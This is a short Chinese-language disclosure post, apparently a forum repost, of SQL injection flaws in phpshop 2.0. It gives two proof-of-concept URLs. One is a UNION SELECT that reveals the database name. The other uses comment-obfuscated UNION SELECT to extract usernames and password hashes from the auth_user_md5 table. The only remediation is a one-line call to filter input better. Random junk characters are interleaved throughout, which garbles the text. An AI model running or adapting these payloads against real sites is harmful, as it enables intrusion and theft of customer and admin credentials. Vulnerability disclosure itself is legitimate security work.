标题 : phpshop 2.0 SQL Injection Vulnerability. {; M$ h" r5 k2 N4 O8 Y( b
& |* ~- L8 T: D( H, }( t1 R
作者 : By onestree
" R) S1 `. @) l* H下载地址 : http://code.google.com/p/phpshop/downloads/list
" O8 Y# T% c' l, K* p! K' ]测试地址: windows 7 / ubuntu; p8 m& z" g2 i7 p7 ]
7 |3 p* l5 A2 Y- B" Z$ V
0 p9 x4 D0 `8 k" b! f; d8 p2 c1 R. DSQLi p0c:
' ^5 Z2 q$ e c3 F: N E
5 J3 I, b% D* L- o4 M6 _0 z6 [" p==================, U. ~4 @1 Q" j% W
$ S/ o2 U% e& S* q5 b/ E) X
http://www.xxx.com /phpshop 2.0/?page=admin/function_list&module_id=11'+ O+ L+ B/ _' o( i
union select 1,database(),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 --# e& f3 r0 L5 P; O
( L" Z3 L) L G/ k6 Fhttp://localhost/phpshop 2.0/?page=shop/flypage&product_id=1087'/**/union/**/select/**/1,1,1,1,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,username/**/from/**/auth_user_md5--
0 N# r- \ R6 ]& v
( ^3 c3 Q8 ?) ?! G3 ? @修复:- [+ N- X, g2 Z* l, x
加强过滤
3 k" P) E, r4 A1 c% H" x# _( r% O9 Z; j
7 E, a9 b9 E7 O# \ |